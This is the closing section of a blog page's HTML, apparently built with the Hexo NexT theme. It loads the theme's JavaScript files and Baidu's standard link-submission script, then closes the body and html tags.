  <script type="text/javascript" src="/js/src/motion.js?v=5.1.3"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.3"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.3"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.3"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
